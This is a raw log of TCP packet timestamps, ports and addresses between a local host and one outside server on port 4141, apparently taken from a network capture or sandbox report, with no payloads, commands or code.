Jan 24, 2022 02:25:10.467844009 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.470149994 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.470330000 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.470963001 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.471651077 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.472353935 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.472412109 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.472573042 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.474299908 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.474390984 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.484222889 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.558737993 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.558829069 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.560391903 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.560432911 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.560461044 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.560491085 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.563112974 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.563808918 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.564619064 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.564660072 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.564682961 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.564699888 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.564704895 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.564743996 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.564851046 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.564934015 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.565082073 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.565135002 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.565155983 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.565215111 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.565279007 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.565326929 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.565423012 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.565526962 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.565658092 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.565758944 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.565809965 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.566781998 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.567048073 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.567112923 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.567765951 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.567928076 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.577526093 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.577626944 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.577802896 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.577877045 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.578063965 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.578099966 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.578134060 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.578154087 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.578397036 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.578439951 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.578475952 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.578495979 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.578517914 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.578598976 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.578650951 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.578708887 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.578762054 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.578879118 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.578934908 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.578996897 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.579049110 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.579140902 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.579195976 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.579226971 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.579266071 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.579278946 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.579313993 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.579488993 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.579540014 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.579556942 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.579606056 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.647974014 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.648483038 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.648813009 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.648910046 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.649755955 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.649835110 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.650116920 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.650686979 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.651271105 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.658823967 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.661022902 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.661106110 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.661184072 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.661214113 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.661281109 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.661334991 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.663120031 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.663188934 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.663398027 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.663533926 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.663616896 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.663773060 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.663790941 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.663846970 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.663867950 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.663995981 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.664135933 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.664197922 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.664335966 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.664386988 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.664400101 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.664536953 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.664618969 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.664688110 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.664776087 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.664835930 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.664880991 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.665456057 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.666677952 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.666747093 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.666951895 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.667017937 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.667627096 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.667968035 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.670422077 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.671737909 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.677690983 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.677894115 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.678149939 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.678271055 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.678335905 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.678374052 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.678436041 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.678554058 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.678618908 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.678630114 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.678726912 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.678816080 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.678879976 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.678930044 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.678951025 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.679004908 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.679059029 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.679081917 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.679181099 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.679198980 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.679301977 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.679383993 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.679445982 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.679495096 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.679620028 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.679620028 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.679682016 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.695152998 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.695190907 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.695266962 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.695269108 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.695327044 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.697042942 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.697124958 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.731724024 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.731759071 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.731836081 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.748183966 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.748250008 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.748269081 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.748303890 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.748331070 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.748421907 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.748471022 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.748632908 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.758047104 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.758260012 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.769778013 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.769804955 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.769906998 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.769922972 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.769936085 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.769957066 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.769999981 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.770030022 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.770085096 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.770276070 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.770338058 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.770412922 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.770453930 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.770472050 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.770508051 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.770534039 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.771711111 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.771785975 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.782511950 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.782629013 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.782840014 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.782869101 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.782917023 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.782933950 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.782938957 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.783016920 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.783071041 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.783097982 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.783139944 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.783163071 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.783438921 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.783539057 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.783602953 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.783622026 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.783685923 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.783699989 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.783756018 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.783807039 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.783866882 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.783896923 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.783957958 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.784039974 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.784097910 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.784178972 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.784250975 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.784270048 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.784329891 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.784375906 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.784435034 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.784622908 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.784687996 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.784816027 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.784914970 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.788260937 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.792727947 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.792749882 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.792817116 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.792892933 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.793122053 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.793261051 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.793324947 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.793332100 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.793402910 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.793700933 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.793879032 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.793950081 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.794018030 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.794193983 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.794255018 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.799607992 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.799720049 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.799772978 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.800057888 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.800143003 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.800168991 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.800192118 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.800231934 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.800263882 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.813124895 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.831398964 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.831470013 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.831562042 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.831589937 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.874083042 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.874130011 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.874174118 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.874214888 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.874249935 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.874274969 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.874417067 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.874478102 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.874546051 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.874600887 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.874722958 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.874783993 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.874814034 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.874872923 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.874933958 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.874989986 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.875010967 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.875065088 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.875180006 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.875247002 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.875279903 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.875334024 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.875392914 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.875448942 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.875555992 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.875607967 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.894048929 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.894089937 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.894143105 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.894207001 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.894254923 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.894273996 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.894334078 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.894361019 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.894412994 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.894573927 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.894633055 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.894654989 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.894701958 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.894745111 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.894798994 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.894931078 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.894954920 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.894983053 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.895003080 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.895082951 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.895210981 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.895265102 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.895378113 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.895427942 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.895668983 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.895698071 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.895735025 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.895751953 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.895772934 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.895840883 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.895895958 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.895972013 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.896020889 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.896097898 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.896148920 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.896260023 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.896311045 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.896452904 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.896512985 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.896614075 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.896661997 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.936511993 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.936562061 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.936654091 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.936682940 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.936728954 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.938118935 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.938152075 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.938222885 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.938251019 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.941560030 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.941941977 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.942023039 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.942047119 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.942100048 CET	49777	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:25:10.942166090 CET	4141	49777	185.140.53.6	192.168.2.4
Jan 24, 2022 02:25:10.942224026 CET	49777	4141	192.168.2.4	185.140.53.6
